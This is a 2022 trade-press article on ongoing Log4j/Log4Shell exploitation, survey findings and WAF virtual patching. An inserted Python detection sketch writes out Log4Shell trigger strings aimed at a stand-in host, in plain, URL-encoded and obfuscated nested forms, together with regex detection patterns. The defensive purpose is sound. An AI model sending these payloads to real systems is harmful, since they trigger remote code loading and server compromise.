 Channel Futures

MSSP Insider



Log4j Vulnerability Remains Headache for Cybersecurity Pros, Likely Exploited in Ukraine Attacks

  • Written by Edward Gately
  • March 2, 2022
The risk of having the vulnerability exploited is much higher under the circumstances.

A new Neustar International Security Council (NISC) survey shows the Log4j vulnerability continues to plague security professionals globally. Moreover, threat actors could exploit Log4j in attacks against Ukraine.

Three out of five organizations have fielded Log4j attacks. Log4Shell is a zero-day exploit in the popular Java logging library log4j. It results in remote code execution (RCE) by logging a certain string.

Researchers discovered the Log4j vulnerability in early December, and it led to an explosion of attacks.

Carlos Morales is senior vice president of solutions at Neustar Security Services.


“In general, there is ample evidence of increased cyber activity towards Ukraine-based companies,” he said. “So it is of great importance for those companies to ensure they are preventing access to any known vulnerabilities like Log4j that could be exploited. The risk of having the vulnerability exploited is much higher under the circumstances.”

Personally Impacted by Log4j Vulnerability

Among the NISC survey findings:

  • Log4j has personally impacted three-quarters of respondents. In addition, one in five said the impact had been significant.
  • Nearly half said Log4j has made them reevaluate software supply chain security practices and purchasing decisions.
  • A substantial majority said regulatory bodies like the Federal Trade Commission (FTC) should take legal action against organizations that fail to patch for Log4j.

For companies that have deployed web application firewall (WAF) technology or contract WAF functions from their cloud security providers, there may be a simple solution for handling zero-day threats like Log4j. That’s virtual patching.

Virtual patching tricks any potential attackers into thinking that applications aren’t vulnerable to a threat, Morales said.

“The WAF terminates the connection with the client, ensures that the client is not performing any malicious actions, and then creates a separate connection to the server, bridging data between the two,” he said. “Since it is terminating the client traffic, the WAF can act on behalf of the origin server and cover up for any vulnerabilities that exist on the server.”
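The inspection step Morales describes can be sketched as follows. This is an added example, not code from Neustar, Barracuda or the article; it assumes the widely documented Log4Shell trigger form (a `${jndi:...}` lookup inside a logged field), and the function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Direct JNDI lookup expression in a field that the origin may log.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup, which hides the keyword from JNDI above.
NESTED = re.compile(r"\$\{[^}]*\$\{")


def normalize(value, rounds=3):
    """URL-decode a bounded number of times so encoded '$' and '{' become visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(path, headers, body=""):
    """Return (field, reason) findings for every client-controlled field."""
    fields = [("path", path), ("body", body)]
    fields += [("header:" + name, value) for name, value in headers.items()]
    findings = []
    for name, raw in fields:
        text = normalize(raw)
        if JNDI.search(text):
            findings.append((name, "jndi-lookup"))
        elif NESTED.search(text):
            findings.append((name, "nested-lookup"))
    return findings


def virtual_patch(path, headers, body=""):
    """Decide at the proxy: block on any finding, otherwise forward to the origin."""
    findings = inspect_request(path, headers, body)
    return ("block", findings) if findings else ("forward", [])


if __name__ == "__main__":
    # Constructed sample requests (example.invalid is a reserved, non-routable name).
    samples = [
        ("/search?q=log4j+status", {"User-Agent": "Mozilla/5.0"}),
        ("/", {"User-Agent": "${jndi:ldap://example.invalid/a}"}),
        ("/%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D", {}),
        ("/", {"X-Api-Version": "${${lower:j}ndi:ldap://example.invalid/a}"}),
    ]
    for path, headers in samples:
        print(path, headers, "->", virtual_patch(path, headers))
```

A pattern filter like this only covers the request fields and encodings it inspects, which is why the article's sources still treat patching the library as critical.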

Still At It 2 Months Later

Hackers pounced on Log4Shell vulnerabilities in December, and hackers are still at it two months later, according to new Barracuda research.

Since Dec. 10, Barracuda researchers have analyzed the Log4j software attacks and payloads detected by its systems. The volume of attacks attempting to exploit these vulnerabilities has remained relatively constant with a few dips and spikes over the past two months.

Given the popularity of the software, the exploitability of the vulnerability and the payoff when a compromise happens, Barracuda researchers expect this attack pattern to continue, at least for the short-term.

Among Barracuda research findings:

  • The majority of attacks came from IP addresses in the United States. Half of those IP addresses are associated with Amazon Web Services (AWS), Azure and other data centers.
  • Threat actors are sending attacks from Japan, Germany, Netherlands and Russia.

Tushar Richabadas is Barracuda’s senior product manager of application and cloud security. He said cybercriminals likely have had some success with Log4Shell.


“We’re seeing a lot of scans, and a lot of attacks, but not many high-profile breaches,” he said. “A large portion of the exploit attempts are cryptominers. There were also distributed denial-of-service (DDoS) bots like Mirai and such. We’re slowly hearing about more significant attackers like the … Conti group using this vulnerability. So we’ll likely see bigger breaches happening over time.”

Long Tail for Log4j Attacks

There is probably going to be a long tail for these attacks and scams, Richabadas said. Therefore, patching is going to remain critical for a very long time.

ProxyLogon vulnerabilities were discovered in March of last year. However, Barracuda saw renewed interest from malware groups in November, he said.

“We’ll probably see something similar with Log4Shell as well,” Richabadas said. “A large number of organizations have patched or upgraded their vulnerable installations, and have also added layers of protection against such attacks. This is something that has stopped a large number of these attacks. In terms of stopping the threat actors themselves, the most effective has been the takedowns of the payload servers and callback servers.”
